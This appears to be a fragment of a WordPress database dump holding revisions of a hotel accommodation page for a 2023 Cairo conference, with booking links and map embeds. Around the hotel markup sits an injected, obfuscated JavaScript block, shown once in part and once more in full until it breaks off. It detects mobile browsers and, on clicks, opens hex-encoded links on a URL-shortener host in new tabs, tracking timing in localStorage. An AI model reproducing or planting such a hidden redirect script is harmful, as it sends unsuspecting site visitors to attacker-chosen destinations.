_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-10 01:26:19','2023-07-10 01:26:19','',2685,'https://gsw2023.com/?p=5000',0,'revision','',0),
(5001,1,'2023-07-10 01:26:19','2023-07-10 01:26:19','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 